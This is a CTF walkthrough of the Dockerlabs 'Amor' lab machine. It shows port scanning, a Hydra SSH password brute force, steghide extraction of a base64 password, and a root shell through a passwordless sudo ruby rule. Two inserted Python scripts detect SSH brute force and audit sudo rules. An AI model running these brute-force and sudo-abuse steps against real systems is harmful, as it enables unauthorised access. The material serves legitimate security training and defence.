Amor

TAG -> Dockerlabs | CTF

Data
  • Machine -> Amor

  • Difficulty -> Easy

  • Creator -> romabri

From the working directory, as always, we first check connectivity to the target machine.

❯ ping -c 1 172.17.0.2 -R
PING 172.17.0.2 (172.17.0.2) 56(124) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.144 ms
RR: 	172.17.0.1
		172.17.0.2
		172.17.0.2
		172.17.0.1

--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.144/0.144/0.144/0.000 ms

The machine answers correctly, and the TTL of 64 suggests a Linux host. With mkt we create our additional folders, move into recognition and run an initial scan to get a better idea of the target.

❯ PortScanner -i 172.17.0.2 -t 1000 -s 2 -a V C -o recognition.txt

[+] Autor: Anonymous17
[+] Targeted: 172.17.0.2
[+] (TTL -> 64): Linux
[!] Escaneo de puertos (socket):

  [!] Puerto 22 abierto!
  [!] Puerto 80 abierto!
  [+] Port: 1000 / 1000 

[+] Lista de puertos abiertos: [22, 80]
[+] Información de servicios y versiones:

  [+] 22/tcp    ssh       OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
  [+] 80/tcp    http      Apache httpd 2.4.58 ((Ubuntu))

[+] Comprobando vulnerabilidades:

  [+] SSH parece seguro contra enumeración de usuarios  
  [+] Tecnologías detectadas en HTTP:

        http://172.17.0.2:80 [200 OK] Apache[2.4.58],
        Country[RESERVED][ZZ],
        HTML5,
        HTTPServer[Ubuntu Linux][Apache/2.4.58 (Ubuntu)],
        IP[172.17.0.2],
        Title[SecurSEC S.L],

[*] Evidencia guardada en recognition.txt

Ports 22 and 80 are open; we check for possible vulnerabilities with nmap.

❯ nmap -sCV -p 22,80 172.17.0.2 -oN targeted.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 15:37 EST
Nmap scan report for 172.17.0.2
Host is up (0.0016s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 7e:72:b6:8b:5f:7c:23:64:dc:15:21:32:5f:ce:40:0a (ECDSA)
|_  256 05:8a:a7:27:0f:88:b9:70:84:ec:6d:33:dc:ce:09:6f (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: SecurSEC S.L
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds

Nothing interesting here, so we run a more thorough scan.

❯ nmap -A --script http-headers 172.17.0.2 -oX xml -oN targeted_A.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 15:39 EST
Nmap scan report for 172.17.0.2
Host is up (0.065s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-headers: 
|   Date: Sat, 12 Oct 2024 20:39:50 GMT
|   Server: Apache/2.4.58 (Ubuntu)
|   Last-Modified: Fri, 26 Apr 2024 10:32:34 GMT
|   ETag: "bd9-616fd6bf4b480"
|   Accept-Ranges: bytes
|   Content-Length: 3033
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   64.65 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

This scan shows nothing suspicious either. We could also run a fuller vulnerability scan, but in this case we head to the website to see what the page is about. It turns out to be a kind of forum where the company's internal events are posted: cyber attacks, layoffs and poor cybersecurity practices. We see several users, among whom carlota stands out as head of the cybersecurity department, so we try brute-forcing her SSH password with Hydra.

❯ hydra -l carlota -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4 -f -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-12 15:50:18
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "iloveyou" - 5 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "princess" - 6 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "1234567" - 7 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "rockyou" - 8 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "12345678" - 9 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "abc123" - 10 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "nicole" - 11 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "daniel" - 12 of 14344399 [child 3] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "babygirl" - 13 of 14344399 [child 1] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "monkey" - 14 of 14344399 [child 0] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "lovely" - 15 of 14344399 [child 2] (0/0)
[ATTEMPT] target 172.17.0.2 - login "carlota" - pass "jessica" - 16 of 14344399 [child 3] (0/0)
[22][ssh] host: 172.17.0.2   login: carlota   password: babygirl
[STATUS] attack finished for 172.17.0.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-12 15:50:30
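From the defender's side, the run above is loud: every guess lands in the target's sshd log as a `Failed password` line, and the successful guess follows seconds later as an `Accepted password` line from the same source. The following Python script is an added example, not part of the original write-up, that implements that detection over constructed sshd log lines mirroring this run; the source address 172.17.0.1, the process ids, the year and the thresholds are assumptions chosen for illustration.

```python
"""Flag SSH password brute force from sshd log lines.

Added example, not part of the original write-up. Each Hydra guess shows up
on the target as a "Failed password" line; the successful guess follows as an
"Accepted password" line from the same source. The detector keeps a sliding
window of failures per (source, user) and marks a burst that ends in an
accepted login as a likely compromise. Source address 172.17.0.1, the pids,
the year and the thresholds are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Classic syslog-style sshd line (no year), e.g.
# "Oct 12 15:50:18 host sshd[1200]: Failed password for carlota from 172.17.0.1 port 40000 ssh2"
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2"
)

FAILURE_THRESHOLD = 10   # failures from one source for one user ...
WINDOW_SECONDS = 60      # ... within this many seconds

# Constructed sample mirroring the Hydra run: 16 failures for carlota in
# eight seconds, then the accepted login, plus an unrelated normal login.
SAMPLE_LOG = "\n".join(
    [f"Oct 12 15:50:{18 + i // 2:02d} de05017a2d3a sshd[{1200 + i}]: "
     f"Failed password for carlota from 172.17.0.1 port {40000 + i} ssh2"
     for i in range(16)]
    + ["Oct 12 15:50:30 de05017a2d3a sshd[1300]: "
       "Accepted password for carlota from 172.17.0.1 port 40016 ssh2",
       "Oct 12 15:55:02 de05017a2d3a sshd[1400]: "
       "Accepted password for oscar from 172.17.0.9 port 50010 ssh2"]
)


def parse_sshd_line(line, year=2024):
    """Return (timestamp, result, user, src) or None for non-auth lines."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, threshold=FAILURE_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per (source, user) whose failures exceed the threshold
    inside the sliding window; `succeeded` is set when an accepted login from
    the same source follows the burst within the window."""
    win = timedelta(seconds=window)
    failures = defaultdict(list)   # (src, user) -> failure timestamps in window
    alerts = {}                    # (src, user) -> alert dict
    for line in log_text.splitlines():
        rec = parse_sshd_line(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        if result == "Failed":
            # Slide the window: keep only failures not older than `window`.
            recent = [t for t in failures[key] if ts - t <= win] + [ts]
            failures[key] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(key, {
                    "src": src, "user": user, "first_failure": recent[0],
                    "failures": 0, "last_failure": ts, "succeeded": False})
                alert["failures"] = len(recent)
                alert["last_failure"] = ts
        elif key in alerts and ts - alerts[key]["last_failure"] <= win:
            # An accepted login right after a flagged burst means a guess
            # worked: treat the account as compromised, not as a noisy user.
            alerts[key]["succeeded"] = True
    return sorted(alerts.values(), key=lambda a: a["first_failure"])


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        state = "COMPROMISED" if a["succeeded"] else "attempted"
        print(f"{a['src']} -> {a['user']}: {a['failures']} failures, {state}")
```

Run as a script it prints the single alert for carlota. In a real deployment the input would be `/var/log/auth.log` or `journalctl -u ssh`, and the alert would feed fail2ban or a SIEM; a dictionary password on the account of the security lead is exactly what a lockout policy, sshd's `MaxAuthTries` or key-only authentication would have stopped.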

Success: carlota had a weak password, so we connect over ssh and save the credentials in content.

❯ ssh carlota@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:JcHOk/pc2uhMVqRRfurQicP/JMoOAOHmPYJ2pPxOqx0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
carlota@172.17.0.2's password: 
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.9.7-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
$ bash
carlota@de05017a2d3a:~$ ls
Desktop
carlota@de05017a2d3a:~$ cd Desktop/fotos/vacaciones/           
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ ls
imagen.jpg
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ 

In carlota's home directory we find a set of folders and a photo, which we download.

❯ scp carlota@172.17.0.2:/home/carlota/Desktop/fotos/vacaciones/imagen.jpg /root/CTF/Dockerlabs/amor/content
carlota@172.17.0.2's password: 
imagen.jpg                                                                                                                            100%   51KB   6.2MB/s   00:00    
❯ ls
 credentials.txt   imagen.jpg

We check whether the image hides any information using steghide.

❯ steghide extract -sf imagen.jpg
Anotar salvoconducto: 
anoté los datos extraídos e/"secret.txt".
❯ ls
 credentials.txt   imagen.jpg   secret.txt
❯ bat secret.txt
───────┬─────────────────────────────────────────────────────────────────
       │ File: secret.txt
───────┼─────────────────────────────────────────────────────────────────
   1   │ ZXNsYWNhc2FkZXBpbnlwb24=
───────┴─────────────────────────────────────────────────────────────────

The image hides a txt file containing what looks like a cipher, but it is really just base64, so we decode it.

❯ echo "ZXNsYWNhc2FkZXBpbnlwb24=" | base64 -d; echo
eslacasadepinypon

We get what looks like a password.

carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ su root
Password: 
su: Authentication failure
carlota@de05017a2d3a:~/Desktop/fotos/vacaciones$ cd
carlota@de05017a2d3a:~$ cd ..
carlota@de05017a2d3a:/home$ ls
carlota  oscar  ubuntu
carlota@de05017a2d3a:/home$ su oscar
Password: 
$ bash
oscar@de05017a2d3a:/home$ cd
oscar@de05017a2d3a:~$ 

We try it with root and it is not that account's password, but we see another user on the system, and the credentials turn out to be oscar's.

oscar@de05017a2d3a:~$ sudo -l
Matching Defaults entries for oscar on de05017a2d3a:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User oscar may run the following commands on de05017a2d3a:
    (ALL) NOPASSWD: /usr/bin/ruby

It is interesting that oscar can run ruby as the superuser without entering root's credentials, so we will try to abuse this binary using searchbins.

❯ searchbins -b ruby

[+] Binary: ruby

[*] Functions: -> [https://gtfobins.github.io/gtfobins/ruby]

	[✔] capabilities (1)
	[✔] file-download (1)
	[✔] file-read (1)
	[✔] file-upload (1)
	[✔] file-write (1)
	[✔] library-load (1)
	[✔] reverse-shell (1)
	[✔] shell (1)
	[✔] sudo (1)

[*] Execute: -> searchbins -b ruby -f <function> (For a specific function)

	    -> searchbins -b ruby -a (For all available functions)

❯ searchbins -b ruby -f sudo

[+] Binary: ruby

================================================================================
[*] Function: sudo -> [https://gtfobins.github.io/gtfobins/ruby/#sudo]

	| sudo ruby -e 'exec "/bin/sh"'

Using the command provided by searchbins we become root.

oscar@de05017a2d3a:~$ sudo ruby -e 'exec "/bin/sh"'
# bash
root@de05017a2d3a:/home/oscar# cd
root@de05017a2d3a:~# whoami
root
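The rule `(ALL) NOPASSWD: /usr/bin/ruby` is the whole privilege escalation: an interpreter that runs as root with no argument restriction is equivalent to a root shell, which is what the one-liner above demonstrates. The following Python script is an added example, not part of the original write-up, that parses `sudo -l` output in the format shown above and flags such rules; the `SHELL_CAPABLE` set and the two extra rules in the sample are constructed for illustration.

```python
"""Audit `sudo -l` output for passwordless rules that hand out a root shell.

Added example, not part of the original write-up. The parser understands the
rule lines `sudo -l` prints under "User X may run the following commands":
    (runas) [TAG: ...] /path/to/cmd [args], /path/to/other
SHELL_CAPABLE is an illustrative, non-exhaustive set of programs that GTFOBins
documents as able to exec a shell when run through sudo.
"""
import os
import re

SHELL_CAPABLE = {
    "ruby", "python", "python3", "perl", "php", "node",
    "bash", "sh", "zsh", "vim", "vi", "less", "more", "find", "awk", "env",
}

# (runas) optional TAG: list, then the comma-separated command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Constructed sample: oscar's rule from the write-up plus two extra rules
# (a harmless one and a fixed-script one) to show how findings differ.
SAMPLE_SUDO_L = """\
Matching Defaults entries for oscar on de05017a2d3a:
    env_reset, mail_badpass, use_pty

User oscar may run the following commands on de05017a2d3a:
    (ALL) NOPASSWD: /usr/bin/ruby
    (root) /usr/bin/cat /var/log/apache2/access.log
    (ALL) NOPASSWD: /usr/bin/ruby /opt/app/report.rb
"""


def parse_sudo_l(text):
    """Yield (runas, tags, command) for every rule in `sudo -l` output."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(", "):
            yield m["runas"].strip(), tags, cmd.strip()


def audit_sudo_rules(text):
    """Return findings for rules that let the user reach a root shell."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        argv = cmd.split()
        prog = os.path.basename(argv[0])          # /usr/bin/ruby -> ruby
        if prog not in SHELL_CAPABLE:
            continue
        nopasswd = "NOPASSWD" in tags
        if len(argv) == 1:
            # Bare interpreter/editor: the user chooses the code that runs as root.
            severity = "critical" if nopasswd else "high"
            reason = f"{prog} with no argument restriction can exec a shell as {runas}"
        else:
            # Fixed script: only dangerous if the script or its directory is
            # writable by the invoking user, which a follow-up check must verify.
            severity = "medium"
            reason = f"{prog} runs a fixed script; verify {argv[1]} is root-owned and not writable"
        findings.append({"runas": runas, "command": cmd, "nopasswd": nopasswd,
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{f['severity'].upper()}] {f['command']} -> {f['reason']}")
```

If a task genuinely needs ruby as root, the safer rule grants a fixed, root-owned script (`/usr/bin/ruby /opt/app/report.rb`) rather than the bare interpreter, with the script and its directory unwritable by the invoking user; the audit rates the bare interpreter critical and the fixed-script form medium for exactly that reason.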

We now have maximum privileges, and we can read a thank-you flag left by the machine's creator.

root@de05017a2d3a:~# ls
Desktop
root@de05017a2d3a:~# cat Desktop/THX.txt 
Gracias a toda la comunidad de Dockerlabs y a Mario por toda la ayuda proporcionada para poder hacer la máquina.
root@de05017a2d3a:~# 